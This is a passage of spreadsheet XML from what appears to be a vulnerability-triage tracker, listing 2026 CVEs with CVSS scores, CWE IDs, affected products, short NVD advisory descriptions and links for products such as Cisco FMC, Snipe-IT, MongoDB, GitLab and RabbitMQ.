          <t>CWE-295</t>
        </is>
      </c>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure FMC Software and Cisco Secure FTD Software could allow an unauthenticated, adjacent attacker to impersonate the peer device and obtain access at the level of the&amp;nbsp;manager role, which is equivalent to root.
This vulnerability is due to improper management of the TLS certificate for the sftunnel management connection. An attacker could exploit this vulnerability by connecting to the sftunnel port using a crafted TLS certificate. A successful exploit could allow the attacker to become a registered sftunnel peer with root access.
Note: The attack is successful only if the sftunnel connection is down or the attack can disrupt the sftunnel connection long enough to execute the attack.</t>
        </is>
      </c>
      <c r="S358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20323</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69646</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr"/>
      <c r="Q359" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="S359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86771</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr"/>
      <c r="Q360" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to HTML-escape the employee_num field in the acceptance PDF generator, allowing attackers with users.edit permission to inject img tags into TCPDF's writeHTML() function. Attackers can craft a malicious employee_num value containing an img tag with an arbitrary HTTP(S) URL to trigger server-side requests to internal services, cloud metadata endpoints, or external targets when a victim signs an asset acceptance.</t>
        </is>
      </c>
      <c r="S360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86771</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87034</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr"/>
      <c r="Q361" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87034</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88033</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr">
        <is>
          <t>mongodb:java_driver</t>
        </is>
      </c>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr"/>
      <c r="Q362" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Java Driver can cause a caller-supplied structured file identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence the identifier passed by an affected application may obtain stored file content beyond the intended target or cause all GridFS file chunks in the affected bucket to be removed, rendering stored file content unreadable. The affected rename operation may also rename a stored file other than the intended target.</t>
        </is>
      </c>
      <c r="S362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88033</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92467</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr"/>
      <c r="Q363" s="5" t="inlineStr">
        <is>
          <t>CWE-620</t>
        </is>
      </c>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>zlt2000 microservices-platform through 6.0.0 contains an unverified password change vulnerability in the PUT /users/password endpoint that allows authenticated users to change any account password by omitting the current password check. Attackers can supply an arbitrary user id in the request body and a new password to overwrite credentials of any non-administrator account without verification.</t>
        </is>
      </c>
      <c r="S363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92467</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92752</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr"/>
      <c r="Q364" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>metasfresh DocumentAttachmentsRestController and CommentsRestController endpoints check only that callers are logged in without enforcing record-level permissions. Attackers can enumerate sequential document identifiers to read, replace, and delete attachments and comments on records their role cannot access.</t>
        </is>
      </c>
      <c r="S364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92752</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17467</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr"/>
      <c r="Q365" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>IBM Cloud Pak for Data System (Yosemite 1.0) 3.0.5.2 could allow a remote attacker to obtain sensitive information due to the use of weak or deprecated cryptographic protocols.</t>
        </is>
      </c>
      <c r="S365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17467</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57132</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr"/>
      <c r="Q366" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.62, setting PRAISONAI_CALL_AUTH to disabled makes verify_token accept requests to /api/v1/agents/{id}/invoke without CALL_SERVER_TOKEN authentication. Deployments that use the application's advertised opt-out can expose registered agents and their connected tools or private context to unauthenticated invocation. The vulnerability is fixed in 4.6.62.</t>
        </is>
      </c>
      <c r="S366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57132</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63127</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr">
        <is>
          <t>rust:rmcp</t>
        </is>
      </c>
      <c r="M367" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr"/>
      <c r="Q367" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>RMCP is an official Rust SDK for the Model Context Protocol. Prior to 2.0.0, the rmcp crate's OAuth implementation in crates/rmcp/src/transport/auth.rs omits the RFC 9728 resource field from ResourceServerMetadata and allows discover_oauth_server_via_resource_metadata to use protected-resource metadata without confirming that the returned resource identifier exactly matches the configured MCP server. A malicious MCP server can publish metadata for a different legitimate MCP resource and its authorization server, causing a victim who connects and completes the authorization flow to obtain a legitimate access token that the client subsequently sends to the malicious server. The attacker can capture the token and impersonate the victim against the legitimate MCP resource within the token's granted scopes. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="S367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63127</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65838</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr"/>
      <c r="Q368" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>Skipper is an HTTP router and reverse proxy for service composition. Prior to 0.27.35, the opaAuthorizeRequestWithBody filter in filters/openpolicyagent/openpolicyagent.go can allow an oversized declared Content-Length request to bypass a deny-on-presence Rego policy because ExtractHttpBodyOptionally leaves OPA with an empty parsed_body while forwarding the complete request body upstream. This incomplete remediation of CVE-2026-50197 affects deployments that authorize request-body content and exceed -open-policy-agent-max-request-body-size, which defaults to 1 MB. Policy logic that does not reject input.attributes.request.http.truncated_body can therefore fail open and permit a forbidden payload to reach the protected service, while small bodies and the previously fixed chunked-body case are evaluated normally. This issue is fixed in version 0.27.35.</t>
        </is>
      </c>
      <c r="S368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65838</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71180</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr"/>
      <c r="Q369" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>Dell Update Package Framework, versions prior to 26.07.03, contains an Unchecked Return Value vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="S369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71180</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76413</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr"/>
      <c r="Q370" s="5" t="inlineStr">
        <is>
          <t>CWE-1259</t>
        </is>
      </c>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Adaptive Security Device Manager (ASDM) single sign-on (SSO) handler for Cisco Secure FMC Software could allow an unauthenticated, remote attacker to log in as the Cisco ASDM administrator user.
This vulnerability is due to improper management of the Cisco ASDM SSO token. An attacker could exploit this vulnerability by performing session token forgery techniques. A successful exploit could allow the attacker to log in as the administrator user and, by repeating this action, keep legitimate administrators locked out of the ASDM indefinitely.</t>
        </is>
      </c>
      <c r="S370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76413</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77406</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr"/>
      <c r="Q371" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, Channel.Qos in channel.go accepts negative prefetchCount and prefetchSize integers and casts them directly to uint16 and uint32 fields in the basic.qos method because validateQos is absent. Values such as -1 therefore wrap to 65535 or 4294967295 instead of being rejected. An application that permits untrusted configuration of these Qos values can unintentionally request extremely large prefetch limits, allowing a broker to deliver enough queued messages to exhaust client memory and disrupt processing. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77406</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77409</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr"/>
      <c r="Q372" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, Channel.dispatch in channel.go, confirms.confirm in confirms.go, and Connection.dispatch0 in connection.go synchronously send publisher confirmations, flow-control events, consumer cancellations, returned messages, including NotifyConfirm events and connection block notifications, to application-provided channels. If a listener channel is unbuffered, full, or not drained promptly, the sole reader goroutine blocks and stops processing frames, acknowledgments, deliveries, and heartbeats. Broker-driven event bursts can therefore cause connection stalls, missed heartbeats, deadlocks, and disconnection. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77409</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78252</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr"/>
      <c r="Q373" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.3 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that, under certain conditions, an authenticated user could have induced a targeted user to perform unintended state-changing HTTP requests due to improper sanitization of user-controlled data in the Markdown JSON table renderer.</t>
        </is>
      </c>
      <c r="S373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78252</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82786</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr"/>
      <c r="Q374" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R374" s="5" t="inlineStr">
        <is>
